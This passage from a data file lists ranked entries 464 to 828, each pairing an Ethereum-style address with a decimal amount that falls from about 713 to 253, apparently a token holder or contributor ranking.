(464, '0x5e65355a033e3e3d931a2454c753b1e69c8bf45d', 713.16746673),
(465, '0x19b07734cd36d1f07de9520015586d9422965fcc', 709.76138718),
(466, '0x945452db86dcb75642093dae296e93270103bcf5', 704.05367541),
(467, '0x2e361f82edfc9debe8acaad20d8f75dcc56101b5', 703.79059042),
(468, '0xba350b4a84af3b8c3d50d11c8d080fa615127914', 701.67997643),
(469, '0x29a1ed06127d9e7588686837c559d3c94459f965', 700.53838058),
(470, '0xc893661d44a36f57cd25a2c0bcbd5e2773c17088', 700.0),
(471, '0x76100e93cedbd4fb7c2a585f82ef51c0b612ff06', 700.0),
(472, '0xc9e441e02863d07256739ecfc7add33a1edbf250', 700.0),
(473, '0x9a0474070bd71fcc84a364de4f8a8848f6c4f816', 698.83381477),
(474, '0x167e733de0861f0d61b179d3d1891e6b90587732', 696.47352584),
(475, '0xed53036721b299a5d8d766a75fb9e4ecf90d4038', 696.22323281),
(476, '0xe60b049dbfbd25231deb88d7f6c54e5a196b2450', 689.66344124),
(477, '0x78d4635ec2588de43585ca514e0ea0201c52f689', 688.36920856),
(478, '0xf790ffb2130509e5d66148fbaf1dacdcba2b7feb', 688.0),
(479, '0x351c378f2f7b32445e91e81696529e30c170e29c', 687.65948689),
(480, '0x7573ce09b52a6ba12254666bb897dc3d5620736a', 678.60509962),
(481, '0xe2e41b5154c56f8674c63985c2ef2199763b7779', 672.01679393),
(482, '0xed4c4aab2232319481745849f3406397bebaeaa2', 670.44136145),
(483, '0x81a9c098446c6b4a2a5e91d3bf147aa2c5a0cb55', 665.60402903),
(484, '0x59c559ee6ccb455798de147417c7415202522808', 665.0),
(485, '0x631789090ea8a2910d4dbb2bb5ec335304c35fc9', 664.24845394),
(486, '0x3e7b7134767c44aa7bed6c1a3b6b9da3ebd63a60', 654.51923641),
(487, '0x10D6Da02Cc4618C0843a625aeA2739BEE9473526', 650.35646201),
(488, '0xd4d5a8a75b9915f785229a94bbb74f4dfc646802', 650.02267112),
(489, '0x3750ecf5e0536d04dd3858173ab571a0dcbdf7e0', 644.66382662),
(490, '0x143f0552db48b37f733899897b5a52a4ea6da386', 637.915),
(491, '0xd6388ac51092d758e5eb9c6602d27f21c3609dd0', 635.0),
(492, '0x4b14511029f4cb359f67a6f78e375c8cf7a99f2e', 634.68369772),
(493, '0x0c751e9b472448920e5208b79996e94465cee695', 634.0),
(494, '0xf6f56cdf5ff5faafbfd4cc78f88e4adcc9f7a045', 629.72130776),
(495, '0xbb6c5713119d7dfdb09188d5944b9258f4f408d8', 629.01329897),
(496, '0x3b18dcde59d6535f78e8cf4bea8a4318c0abaef1', 627.43729736),
(497, '0xe0234c374ad613ef04749d1be16ef713ab78ea0c', 627.29769363),
(498, '0x706affb793c634f66891e9444233ff96f2ca761f', 624.57678672),
(499, '0xfa4d3b1183b6a1453a99cb5c60f9f28de12aae7d', 620.6695672),
(500, '0x1262c73929d0d6759203fd3090f3a8a171ddf66a', 619.00668719),
(501, '0x2b2ed20bd432c91a2ff8a8e21453f4bfeb56cd08', 618.85601141),
(502, '0x3745f444229eb1f1b154718aa078842be0bffda6', 617.5),
(503, '0x8fa52df588036144de2bbf76582e653b24fcc401', 614.33512937),
(504, '0xf20375561dddcdc058aeed6da3cdfdd06caeb9e8', 608.53038628),
(505, '0xf3f2ed3d1790e535d364b152392f31ca0bdbf966', 607.62911227),
(506, '0x35918dc7067aa514577e35635b1e596a3c6b23e8', 606.24279554),
(507, '0x4cc8283bd9653a9d1b23823d0821f959f01126dc', 606.18666491),
(508, '0x97d0ac717310060dd93eda2c92ad5696b95ea8c9', 606.00774989),
(509, '0x6c5112e3c4c93ca1c26a804865fde50a68b73f98', 600.0),
(510, '0x75c83ff347218949d6bee8d80ed11210b958d737', 600.0),
(511, '0x5c2e85d6fa005ba1ffbddbf05ceafaba26703f21', 600.0),
(512, '0xe7f4413125b53714b415a73b3bf212a84e703816', 599.60413307),
(513, '0x190b7f50fe3cb11c62681000c28aa591dfd7924c', 598.9),
(514, '0x24f7b5eaa0e9e3c16c70766c4f110b1268b0d1bb', 594.60112132),
(515, '0xfd14ed114ce59d08280bb83555c21c54e63a65d5', 592.68605301),
(516, '0x1c46facafd2589999494793aeb68597fddde0500', 585.21591206),
(517, '0x313a64abf5b503abc71bb8e7140c4314cd20d94e', 583.98128994),
(518, '0xcbb91a5cd898c69e9fa33c062b787eb68c8fec6a', 580.07599596),
(519, '0x3d3533bcb8edfdfd1d430747c487c3d4e9f6bb17', 579.18863499),
(520, '0xf43f5d57ad68cbc2083fa013bd25d82826dcc6d6', 578.66466137),
(521, '0x1fc12b84c542704788313d98ed7543b7c8afd886', 577.64549786),
(522, '0xbcc9399b28fda1d9a050174f792d85134af36681', 577.31445317),
(523, '0x8078660eb8f4fca66a37d0fb9a8aa2ea0c55b1c4', 577.01699667),
(524, '0xbb0a14f44d296693f968e21fc9dcfd77d8071104', 576.6980176),
(525, '0xe3e9a788dad5a631db6458b495a41a513cc4267c', 572.70862877),
(526, '0x5c0f7651dd7fe5e1364daa7c782225fa78c5bd25', 572.0),
(527, '0xc0eddbdb8c6c0c33189e3a43fb5144c42a56d220', 571.42857142),
(528, '0x1cf9f27c7e4754ffec8b5a0a07893c866205b09b', 568.62404966),
(529, '0xa3d095d33ef8395f48b12956d2f4f9d73a37bb73', 566.81030449),
(530, '0x997fd8c1eaf2b388b5a584c05ef538aa76dcc9c3', 565.19079021),
(531, '0xab322d4e885e19701a5041a1b7bf82576cd66fd7', 562.66000854),
(532, '0x38255e460b54d795a3cdb27fed963acd303a5b1d', 556.71448842),
(533, '0x4a029d8f89dcead5876d9a04a8982da83c59cfa4', 555.3977),
(534, '0xee07982f851f4726031b4bedb51d1dbbb8b406ae', 554.96918924),
(535, '0x40cb16980dec30df798e7d34336ba6da4de510f6', 554.35822956),
(536, '0xb95ec7e3b442c3882ae071af26c868dfbefbba31', 553.70242251),
(537, '0x5b369c274f41ac281581005057d1619a384124ac', 552.26048626),
(538, '0xdb20af7cf935dd164be14b921e63686b733bd33e', 550.0),
(539, '0x5496f6f34f7bd669e5e9e5975b3f46f7f2b94c3d', 547.646949),
(540, '0x5dd25b4d3de1df98882a2b4802595ec6d2561e63', 545.46623471),
(541, '0x9f5f1dfdcfcf2a372ed8b3cda388d27c664454c1', 544.72422174),
(542, '0x0c75aacdf13deee4a45e17337b5a499a3c86903c', 544.42923369),
(543, '0xb3336843a629e98e36e2c70ddcb027af0d329233', 541.12975583),
(544, '0xa0920a0414746e2ae92acd7a1199dc13265cbf0f', 536.59972062),
(545, '0x3039c25b2f7395648c9c484c2f45803ff737a96e', 535.32221677),
(546, '0xe86fee1bea5144bbf77ff19fe573de0a6832d804', 532.65583732),
(547, '0x2a8f3ad1a15d57f56b5788ee9c91565c4a3d3c2e', 529.21963289),
(548, '0xfe31fa48f003b95b8c225c7e376b431d0adb4076', 528.57324249),
(549, '0x313e94b807d8b0b05aa0ea2a61f9f9534af1952e', 528.0),
(550, '0xec2e45ea3f784fb35056b3e7f652ea007df36815', 527.36357208),
(551, '0xdf015905263772958598d82fefd6fe4f4bd96100', 526.7211243),
(552, '0x37a9066b0268e0ba405b87813d8c7fd65416e46a', 525.39283326),
(553, '0x2f21da242843d435786b792ba10dc53fd50d0d4a', 525.34352726),
(554, '0xe01b72f825ca66aa1a058c19ad062dfa76f833da', 524.08182163),
(555, '0xccaabe7d8ac33d3d1b2d6f144a38cf722ae83baf', 523.79631279),
(556, '0x7564d1c2aa49c01a5df1ce597c3d63e480b88102', 523.37890499),
(557, '0xa8b8ea4c083890833f24817b4657888431486444', 518.04747556),
(558, '0xc09d6e62f919d0c856f0a144073b85ac8a9e5c75', 511.46935673),
(559, '0xa7b72a56f3f7d18707d7d1c20ed06909fabf40e8', 510.10761808),
(560, '0x9b5487b731eefcc81a9dfab4b4634e6faad7e5b6', 510.0),
(561, '0x00a2543d6ec4b50adf8deac8ce5bb9fdf833e1bf', 509.73032979),
(562, '0x8f7131da7c374566ad3084049d4e1806ed183a27', 509.61559054),
(563, '0xa742bed9cb152516bc4718cc8298e4fd2bce40db', 507.931752),
(564, '0xaa035e3c97d006fae171cd9b4d4f1c86aaa8d6c7', 507.9160869),
(565, '0x91ea62106ef05d240d3e111eb6297e8a1a228359', 507.07492204),
(566, '0x0985224a811e65c235dbf4a2c2117712aabe4e39', 504.54),
(567, '0x2958db51a0b4c458d0aa183e8cfb4f2e95cf6e75', 503.57880696),
(568, '0xf14be3662fe4c9215c27698166759db6967de94f', 502.85806761),
(569, '0x1a11f316bafb95e7ce3f4ae2cbce2a9b96ade7dc', 502.85669886),
(570, '0x02349f669910c5531ac5da683c276a6553d94ca2', 501.446),
(571, '0xa08dc26fe4c3ad3c85583bf677a96193ae5c0e9c', 500.448),
(572, '0xfcc5980dd3dfc672312ab78c5cd30c3c23fbaf9c', 500.33220658),
(573, '0x891d32ccb05d38018810bb07133fe9a9f2bf28d9', 500.16119837),
(574, '0x29a3100a92206477fd4e28ece3bebc55becd9cd7', 500.0),
(575, '0xc8f876836db93986a6e05ab3a1056817dd824464', 500.0),
(576, '0x6849ea4a3ff921ec76cd3fa978773357f4d1d64c', 500.0),
(577, '0x1111011110b787d19f663f14191cc2e78aee2b00', 500.0),
(578, '0xc2a0f9f6423d20fdf500680f52b56a6f45683dca', 500.0),
(579, '0x19ae3e399d81f908a8c0b0f7b4c0c6babf999aaa', 500.0),
(580, '0xf0523201547d94ddb8125b43365dea3df5d23bcf', 500.0),
(581, '0xb17155acf86d6f144c61b7dd0cd473729f104d50', 500.0),
(582, '0xad3bf0298126e4f3fc23130788f9c0f0b1fffaa7', 499.83879613),
(583, '0xd5ec0b48826223bbdf8607b3e245db670f30641e', 497.47157382),
(584, '0x5f62d4e99b8d42fc871cb3211e6e1bc125386daa', 497.16777077),
(585, '0x991c1e4f989afae678a61e4ad957ef1e4d4f2f06', 496.32938416),
(586, '0x0d9a38241c2a251a4f07668ba81952c68e1743dd', 495.7),
(587, '0xf1a5a927721eb14279098e4fc40c9becc8ce8c97', 495.1322155),
(588, '0x86f8a1c372e7f16e648a3dfa377857c0a4297387', 493.2589),
(589, '0x99780923b0370c21a2b2d6894705b3c2f8d5ce32', 493.0),
(590, '0x8df2be7a96c49aefa0f1fb9424524f40f48bff3b', 491.84340057),
(591, '0x3e8cba29f0ff64e1b27b11c64e108218c6354ac4', 490.0),
(592, '0xc50d8687a78680f51da2d666a3f9e13251e7aba5', 489.56584172),
(593, '0x7677f2fee0da6c18532b79e4ddc37d932d79f785', 487.0),
(594, '0x673884a7258b6be7f174ada97f472976cc8b1aa2', 481.67226471),
(595, '0x4b1b1f8250b19bc22cd8b930a90b85621bd3ec58', 470.05799104),
(596, '0x3287b9136f5bfad539ac8f60299cfce2a2b74015', 469.53129026),
(597, '0x3f08af8a69e9247bf9475b2b000779f79a97b0be', 468.4839023),
(598, '0x51b36d1c511488351793e06514484f3f8caea0b3', 464.77613093),
(599, '0x1ae75e3e6b8efdbf3f98003fb0a9a9f47b21178d', 462.86318822),
(600, '0xb0a10e11a3b1b652044481787261cfee12214e57', 461.50770422),
(601, '0x11c7a1813bb63fcf2c7e8bbaaae313fba705f046', 458.63204584),
(602, '0x2490b4f7a3ec7db3a4e78b5c737d2177863ec70d', 458.60611514),
(603, '0x47ce55b6df2980d7c1ea3276f35ae7294e427ca0', 458.09384363),
(604, '0xc9022c09d2405bb015c707697885e672dc8a5007', 456.44066608),
(605, '0xd2e43c04f49aa41d00f491ddb2dd324de47d75c2', 455.04138134),
(606, '0x3d06dfd6416e8707cabb1bb9f116affc4d9521ee', 454.68379926),
(607, '0x8b04614cb99fb0386655130cdfe9a2648edcce42', 453.22898406),
(608, '0x8563195d5c7afa1f888d9b98a5cee1cfc9c872dd', 453.0255102),
(609, '0x02e03db268488716c161721663501014fa031250', 451.62516921),
(610, '0x052b93bab0972df16709ad4808265fbd1ca47320', 450.0),
(611, '0x695d1b61f09d07956af3f93d62aa79b1ab8fa29c', 448.92934758),
(612, '0xe5f77e129dac65b8b174cffd0fbbc31b62b458a8', 444.88278132),
(613, '0x260a10d59ea58c68dbad1422a734723f715a69fc', 444.81850569),
(614, '0x3cd874b77ec4feca32efab84f59672ad9737d743', 442.82887114),
(615, '0x8afce0b7ca212fcd4fd9ea54749c6c48e715c60f', 442.6284946),
(616, '0xce04998e4e8f07e7ac521a136aa6dc69776e8d79', 437.48713249),
(617, '0xf39982387cf7f904aef48663bed114e4125ee515', 437.04695017),
(618, '0x2a34425ee3dc31a190050c50bd2cf9611c4a1497', 436.15728255),
(619, '0xecd050d293610d034ba0191a4e62cbe2de750c3a', 434.15302273),
(620, '0x7f8bb19e5f3f6b8592d099ea9c427bda1bab28b9', 431.84446843),
(621, '0xdfa29ffedcab200b445d18f15a7694a6da85c4b4', 430.318456),
(622, '0x63967b662d097be2ffe0eab61d55ee4b32a69fa4', 429.0),
(623, '0x0f2f9599c19cddd869d0bbf7bc3bfe354dd5b40a', 427.85973527),
(624, '0x5c6080cd34ef4e2742f91b26c851cadae2cf1e05', 425.96496867),
(625, '0x37dcea34f00510ec3992fea2ecb5ead014363db8', 424.20519729),
(626, '0x1fdbf4956a48b525789bfd73a1cba03761192d8c', 423.22540155),
(627, '0x5a5796f45049cb30d35491b0c3183e8a99f12f11', 422.0),
(628, '0xb2371c0c12d79d787311240ff75d864d88b3cab1', 420.20786933),
(629, '0x2079620fbee71576f351cd537433ace87755d25e', 419.96655929),
(630, '0xaaabc6bbe56b5a4f8d1d262a80336ccfd2c35609', 419.03573976),
(631, '0x0423baa1169b4cbdc1e8d784713087954236904e', 414.74566362),
(632, '0x99bcfb26297cdc94411306844d7ca0c18e8317ac', 410.25527082),
(633, '0x29062e6f54c50dddb35d6500ede871852e604457', 409.74195751),
(634, '0x167de00e1b881bc7e26bef7ce5f62dc4b8df209b', 407.56910265),
(635, '0x01c0d535941adf96f90c81546241bc79e7c0f0e4', 407.30784126),
(636, '0x934ba340a1ef0c0f4375afd0bf9a9f90e0afb6a8', 406.69465349),
(637, '0x02c8832baf93380562b0c8ce18e2f709d6514c60', 405.0),
(638, '0x63f2b59051c281291eee4cbbdd32932d8d4fb2f2', 402.12674774),
(639, '0xd4734fde02d9afb4ac66c4daaa4b6b8327a8ded8', 401.0),
(640, '0x23347e15495cbfb542c197393d1fc59680fd80df', 400.2588443),
(641, '0x371c748e0b3eacadf7bf96c67b7bc9ce26de5367', 400.0),
(642, '0xc56e275d1c924b26f3a5b45cd4de2f94efa9fc91', 400.0),
(643, '0x9cf7d9b3351e3d572eb13f87256d65d932a565e9', 400.0),
(644, '0x33460cf7bd35ad0b8a1fe7e6563c1a245380b988', 400.0),
(645, '0x5536464f90a3846c832fa3a2ee9dcfe8895b15d5', 400.0),
(646, '0x1aa9e47e2a99ed5ac0bb9b0920569c55dbb7b230', 400.0),
(647, '0xd6f6dac73b89852f89573903d3867fc7b4936da3', 400.0),
(648, '0x1c8e1085b6903893b88bdd28d569c26780f7862b', 398.2933557),
(649, '0x1b22136d1dde8644719fa4da2fc93d60b2e05ff4', 397.71649608),
(650, '0x32865f7e3e913a2a5ee22b94900f6ac0c75a061d', 392.96027116),
(651, '0x66a39c5f5784100e95e7c75529cbfa33ef2cfbbd', 392.45061359),
(652, '0x57addbcd0953ff2845537fb4b50fb6337d533964', 387.08658262),
(653, '0xab6c998b11c8d886f795c38e0be1ad435e95cd83', 387.06879039),
(654, '0x21a954eba84e9865fa812133e881afb912ef984d', 385.69661258),
(655, '0xe75d29fca129556fcd3840c843980708bc411424', 383.80743965),
(656, '0x6a6ddfc37e5a29424347e953a5b0d5a379c9b237', 382.0),
(657, '0x03736ca98431c0304386d865767b61db3cee0a96', 379.90788963),
(658, '0x23ed325b8d26fbf94410eff31cb5ef7b95972c56', 379.89771081),
(659, '0x3a4dd62195f4dcc3d3c2517f2bc699594fe2cbb9', 378.34599999),
(660, '0x1cfa8a9b320f4fcc22f3504b7d0cc8098f3857a0', 376.9055103),
(661, '0xb0a22717f63644af3c532581bc386faaf60ad8ce', 375.78959858),
(662, '0xed7b96343ed0da8b1d239afe7c4668a70bca2577', 374.44693629),
(663, '0x1a1e55d9272f77e1ebbde9a0d260b7d220ca18f3', 369.6287616),
(664, '0xedf7e493251d6c78115277698e982480b0e1773b', 368.78994759),
(665, '0xabac0fc70e5cbf775d12a5abcf4bf705995b18da', 368.25965517),
(666, '0xefdbb186cb14a090fb9136c7a6400282356e5e22', 366.92065839),
(667, '0x77a3b6102a8f3b1e7aff475a8ea9a856cd7fdabc', 363.79688322),
(668, '0x7f2085a1ece8f74f10adca07cfc936c6a96a0427', 363.59984159),
(669, '0x193ec3dfb0a06db9f02cfdcf301b2c33de31dfff', 363.37521847),
(670, '0x6aa808170712086aec8aa9b39ac80ed0cc55e221', 362.93106255),
(671, '0xb7715b04fa53cff24ba12400be2b7843774f32f6', 362.88895187),
(672, '0x5c9f3794f4308ea8227faed5c3ac5908fa9884e1', 362.50141307),
(673, '0xa1ddd40c4fce771408a4fc0590209cbb3f006f55', 362.0),
(674, '0x92bb7ef350243cbca627ba7076453a5effc2a202', 359.6748983),
(675, '0x4944492e2fb7bf93601b22ea59c49ebd6d185faa', 358.21363892),
(676, '0x5b8807549930b94cf13fe22746f51e2813380987', 358.06720409),
(677, '0xd71e7670ebed1e3ea1536b12d1e6d319da5d6fd9', 356.7627899),
(678, '0x8da1a4d25691d9ffa62b07c5675d4839356cbeb0', 354.7313845),
(679, '0x3183ef2ad7f0a3b5f7dc7c350f4058667d6be781', 351.8619),
(680, '0xa032f572274fb4f3ca2df8dbf5dac279835f2d7b', 351.73274004),
(681, '0xd1f075cd82f8120a47a482f248b0d8254ddd9b2e', 350.3669923),
(682, '0x45bb49591265085eb80c3d03d9281a3be11b355c', 350.30069381),
(683, '0x57efa1eebe1acedc0dd10e6335d829b7c144072a', 350.0),
(684, '0x4fd8511aaea3913f16bcf639cef7988c37ef707a', 350.0),
(685, '0x76625bb609f965f4e0f223431c7e60d9e1fd1013', 350.0),
(686, '0x109c7c68c1f10330bb5f50035f3777eee1fc3cb3', 350.0),
(687, '0x9818fe60a00bcbd56e9aee5cef96c94e329e6dac', 350.0),
(688, '0x2b50d6b35f71ca118c997ed89dfdf96de8437fc6', 350.0),
(689, '0x22667fb14c52d6d781be9884296fb2345abb0697', 349.01673318),
(690, '0x3018f598fcc8aa5acc17c1f133e4679dfcd8274a', 348.0),
(691, '0x8b86b5ecc5c07b609b2a6826612712a43b05423f', 346.5),
(692, '0x2229dbdc40331356f711e9e15385c9f98562a7e7', 346.0),
(693, '0x8f6955595b24b4e530860baea1a92a15cc226aab', 344.43422237),
(694, '0x536ef3c96793af3e1de165994a013ec319c1a72a', 342.90754915),
(695, '0xe7565a6b56bdb796734b54d401463b3d0eae31bb', 342.87),
(696, '0x2bc4a0eaa560236176f85c7a57ac1e7c9b0846f5', 341.08837597),
(697, '0x554e7ee670233f92106137458d5385f4369702a3', 338.85020103),
(698, '0x3590b2919213fb1a09869ceccc481c77a158c9d6', 338.75368584),
(699, '0x90501a884d91e75741625d129df767179931c7be', 338.10807494),
(700, '0x36e5b46b85de9cb2c4fa8d5e0bcb72c3b7cbb76b', 335.77813453),
(701, '0x68d4163c55ddcf49e7b1583d69a2c072cbe560bd', 335.5094125),
(702, '0xaf5bbbe97968b0412715f8ce80c66405677b2be8', 335.09544557),
(703, '0x1993ef941b84f3fcb64b99c857850de9c431e98e', 334.60051252),
(704, '0x9a19cfe15ee6efb5ae9b1d033bf8a36bf99a2df3', 333.34842189),
(705, '0x7dcdb021103a8ef31649044b85619313291b2341', 332.32703544),
(706, '0x371e31169df00563eafab334c738e66dd0476a8f', 331.98857512),
(707, '0x658ecf11ae34bd40fa0527e08d56f346fb655b82', 331.11462132),
(708, '0x87bfe6289b68c6f3d816c438d652c0ea22e87e32', 330.79954986),
(709, '0x3a05a1f13c032694a98135aae4fbffb414a94e33', 329.8141846),
(710, '0x5f607978c76ba75512faaebc56e2e1cede49ff8c', 329.61174953),
(711, '0xcfb87a694c5636429a940ec7433827c83083b269', 329.5612559),
(712, '0xf99c27f2a8ecca6ce73e55a932212455c25ca397', 328.99995803),
(713, '0xf3975394c9509c47917fc25672d2cbdec2f52ea0', 327.87),
(714, '0xe99539d93aca3430b28f31ded4f67437e735e239', 327.28706604),
(715, '0x7e198c3fa520051a68dac97fa94a4221ddac11df', 327.04364102),
(716, '0xccb6098ec527d64617b11c924e6c1fc6467bd1e3', 326.0),
(717, '0xe6157479a2c70e936e54970c61aba50f8c7f09c9', 325.72355963),
(718, '0xcf646051a9f1215dd67f31ad6802a90429bfbdb5', 324.32372021),
(719, '0x003c40ae6be2891d14ed6e19dc1d47bb9462b8d0', 324.0),
(720, '0x2ead1ddaed62f6f36e5f45d4be5b154c9806ea16', 322.40686188),
(721, '0x3cc01bd3fa028bb1f23ead376aaceff53235b3ca', 321.03723993),
(722, '0xa5f4c2207e36e9918f8da433dd0e263b2a6b9d8e', 321.01138171),
(723, '0xaaade1a54cc2765b5905c3f72de18ea6f5d7873f', 320.755555),
(724, '0x67504da78d3c1c7e8d5e7b792c1dbf112a0c6d10', 320.38037697),
(725, '0x55871a59c1635189e91d1e80888c1c578abfca27', 320.21008125),
(726, '0x73196b340a9fa2693d50f8205a5116436ded0c3c', 320.17027905),
(727, '0xa9d4a7d5db31d9e7ca5bb1f41c1d324785b05488', 320.11790285),
(728, '0x6f6559a644f528474ed929a38d94b9cba9654443', 320.0),
(729, '0x8818abe27fe49a47cae82193d84b97e403a47e8c', 318.28708169),
(730, '0x2651aa54f3d5df572dcae2dabf6a49e2e56f4103', 317.34444876),
(731, '0x51e9f8984e2158170212974d930b6256f699a5d3', 315.50902925),
(732, '0x10cc7f90ee99ad2bafb7c74da88d0257cd9bd681', 314.28334651),
(733, '0xec26db2c6e4497cadf41bbfe4f30cd2b4ad877cd', 313.36868276),
(734, '0x67b86ad5e3a07ffded683803da2270676a0bd35a', 312.94549929),
(735, '0x36f9b46fb3db82ba3aadad40832b24fabdf436e3', 312.02343706),
(736, '0xb2d5b8fffbd5a1966dfb7525dbbef7698029f7a7', 311.85684169),
(737, '0xb9b13fc0a1333c8432e9ffa0ebde184966321a3d', 310.8810481),
(738, '0xace766022a1b6d791056cbc089e23577812bc50b', 310.0477478),
(739, '0x2eca99f05547eb5865822a93122a8f71454385e1', 309.30289666),
(740, '0x3b783753acdd152a99404f31272052bc92c28510', 309.06248323),
(741, '0x8a84d0b0c1d5f36b6f3c7ae5a583b74247b7e0c1', 309.05875882),
(742, '0x2cf674dca312cc2f906b9376f0d720e5d030d464', 308.0),
(743, '0xd3107b09a9edc1c98f626b0f9077c6dcd2ba89bd', 307.908),
(744, '0xc7d2e623dcb6c71fa05060cd5dfb72d96465f228', 307.63157854),
(745, '0x9260092ce752c43ad96cd5ff21eada514a23f4a0', 306.75186035),
(746, '0xefdfa03ae571da4316e1166d8897a4299572b315', 306.66810993),
(747, '0x445a4ed48baddabae2ab6a5790efd020a4279115', 306.16484689),
(748, '0x1ce6f2ed6e3faedb0e8721206da2e5b370f460e0', 305.97211648),
(749, '0xf5f749ff9f7c69a89b80d6d0217b011e79faf7b0', 303.64079138),
(750, '0x4d01d11697f00097064d7e05114ecd3843e82867', 303.63337447),
(751, '0x1f3fa52a2a5b8145b075e3d48a546be904481d91', 303.57466553),
(752, '0xbe500cf03b31d956d2ab5e775c91c18d6e53418f', 303.29049714),
(753, '0x7392f1e82a44bfdaa79531023a6230e6f0fdaeeb', 302.31906298),
(754, '0x9c04bca50dcfa49b25490d969961bfc081f9552f', 300.76859035),
(755, '0xf4c61dab2461d2465aded3ead28f0c390de10843', 300.66689267),
(756, '0x710e5b9da20ea663f8b179a3bf38c2322ab82604', 300.0),
(757, '0x30d079969bd2f8ff8530a8bff576bf469f8646ca', 300.0),
(758, '0x2a20625e96deeab449bb89979c6ba7801dc0ed9e', 300.0),
(759, '0x2e2180cef28ba03ed896d18701c721ba70362a0a', 300.0),
(760, '0x7057a22fd7a5c4e3a9e9b1516851e99f099e35b1', 300.0),
(761, '0xc922de5385d2f08218cef5b686ba8d790d718010', 300.0),
(762, '0x6c7a3c832e573b1d7f3c9f7d51b2ec13f461dbe1', 300.0),
(763, '0x728325a626ef65b5ecff44310c6808b3736c686c', 300.0),
(764, '0x494cf2c35f752ea1e0b8e5e4f1a04698ff8b1338', 300.0),
(765, '0x709ff6949b63d24b8fa44d8ec6d32302dfca4d23', 300.0),
(766, '0xBcC4628a0B71C4dD69D8f7829cB79E42F8a4BCDe', 300.0),
(767, '0x3760ef16041619f0ec3891632e4ae79218981f62', 300.0),
(768, '0x7744444bad94d7db8b185e41d0a6b8fdc675fe47', 299.55959304),
(769, '0xa64919ee4501b74ebe1ed955dec5200699055ade', 298.97674942),
(770, '0xd325e5e246236cd1c767a91168f96a08fc020031', 298.845625),
(771, '0x35d7bc62e2fda111893a8b7fc8395eb957a65638', 298.0),
(772, '0x7d53da4431c1dfe656635d844e0db44ec901c1a2', 295.74041708),
(773, '0x52d4dd31b1c314c1f59ace974f34a81f7f75b86c', 295.39721518),
(774, '0x70c40c4528826a6181ed7a7306b37e972d0a389b', 295.31283653),
(775, '0xc7c12e35f6f10863d51e541dd143a9f6a6c8cbc8', 295.0099691),
(776, '0x7c512e289935fbbb416bf1e2fc09ae80dc44634b', 294.3317),
(777, '0xbc6cbbf40b0609f8340cc29e1438b7c84e6a4837', 293.20737932),
(778, '0x76e5f1e5aede232ee237f057da846b5d51426c56', 291.7963052),
(779, '0x3df124e8d621f4d165d31f8eb8f4e718b2193a95', 291.41975275),
(780, '0xc312c8ea8fb8b2d3f5d3bc8334062cc200882f78', 290.09372407),
(781, '0x8fb9099238dbfd7a884fb2b6ee70e6b3593a8d0e', 289.38926647),
(782, '0xb03ae8cf677662b458b6bc28edb1c10fe758f2de', 289.0),
(783, '0x2db3ec7516bc77059344df4c7fbe923a0ea13084', 287.72556154),
(784, '0x2e509ba9089ebe71793bc53544b982b59e1f23c3', 287.40148617),
(785, '0xf93bbf0ced03cb8758b512d4dde331073ad3009d', 287.22375604),
(786, '0x33669f15ed78bbbb9e6bb7edd5049e068d14afba', 285.22063294),
(787, '0x15c398709007c28ce0258363d2b52db140bd59c0', 284.91768291),
(788, '0x08cdc5f71372f6310880de60ad9583cf659d4d4e', 283.40636702),
(789, '0xbc69705d0f70727c59dc7c5813bf310e4ee4df2e', 283.1460731),
(790, '0x550d1dc4d947195fdfe54a949fe2d2a90a22e944', 281.19519419),
(791, '0x70cd6ffca694ee8136ebe2b610daecf9fe6019ad', 279.85418564),
(792, '0x96b5b7cbeb1d04eea03ed8b03bed0f6dd352c571', 279.62666658),
(793, '0xc1b46bb724a3b4f777eb6f649a03da2a53e7e249', 277.37899308),
(794, '0xbc80e5d89fb7ddc17c712c73b9efdb51bfcde3ca', 277.01464732),
(795, '0x5670f282ffad01f2bb630e732f47ab6def954209', 276.56815898),
(796, '0x5823b8cc89801a09c45e0d06f73a93052aaeecbb', 276.35017299),
(797, '0xd84f96ca233e44c1fcf3fde888bb0b3b080c00cc', 276.03893107),
(798, '0xc49fb9b118408e91a1c5b7e05820484402375f6d', 273.89740926),
(799, '0x2fe8283062fc30cb0bed18408ace49d8adccdfa7', 273.7991923),
(800, '0x7734c9644bfbf38bde0cddb2bdffb60b2eec04e7', 272.53411013),
(801, '0x111e68eea84579ed4a8c95cd1770f314a6cab950', 272.0180342),
(802, '0x6d2242fd00af0f767f53422d22d09286403ea017', 270.93956265),
(803, '0xe57a18783640c9fa3c5e8e4d4b4443e2024a7ff9', 268.46005552),
(804, '0x7021ae2aeae78392f98f7365c2e5770adc1c46a1', 268.4477532),
(805, '0x45c0a8f62ddfdbe2dc5a9921549783d9e0c32ef9', 266.01201613),
(806, '0x7cF88c57E7e03b4a423C52434A63c4CED771346B', 265.54320081),
(807, '0x0a674a97b5e66dd09b8a333d0bd1f45405731fcf', 265.28357862),
(808, '0x3ca4d035f80d9ac12a675d7b7dc8b399cd4a61c3', 264.64540184),
(809, '0x23d534b3296908b122c60b9db298e58ecd1b0f09', 264.22735755),
(810, '0xacf6876f317b78f6913c98e512de3e1572b34120', 263.85938396),
(811, '0xf3d1875c8b7d1bd409f096de4edb405d47270689', 263.0770529),
(812, '0xcc756e62461093382ad0aca60cb2f1bc9a52bb97', 263.05284221),
(813, '0x002b2765ae2e03f9f6da2cd2af5ed3ee329c1356', 263.0),
(814, '0x4eb5015d4cb7b4905324739111a3c8c53917dbc3', 262.94729147),
(815, '0xa2bf4413f0f4a61707142b9edd60fae229c48456', 262.91106882),
(816, '0x16db85231fe5fa48b63b2aed0c901deca25e2611', 262.42702953),
(817, '0xdbcf13c243060ebfb674da507d60c5daf553ba54', 261.42864721),
(818, '0x770e4ca3051f265e4ddacb482de877aa76730717', 261.0),
(819, '0xb39aa81403def2c32e088ac103bf52b9a8422ba3', 259.90825628),
(820, '0x33c1aada397f79cfae5b23c43ec46420c91c418d', 259.64663781),
(821, '0x8c31e53563d9f5c1d74541232d5f85ee4d5948a3', 259.6079708),
(822, '0xdd93cfb9abb42f21f8c6d9e9bef2c4f94d7c898a', 259.21554147),
(823, '0xf1ff7d26951d1fef8d59d754efb083d1305b05f0', 258.7967909),
(824, '0xc45fc6db6af5ddec98cc3e16b6d941ac9fb2d0e2', 256.7780919),
(825, '0x4f61ed67b141eccbc24df163e5deb8140e7b7600', 256.08582357),
(826, '0x9b15f2aab275c05ac58c49804247c663522ed7af', 255.7386441),
(827, '0x245b050415166348c2b825792b7b58c5c87e789a', 253.71547808),
(828, '0x2575588a922d8f611a6151dd1b332a1badc47f1c', 253.66455593),
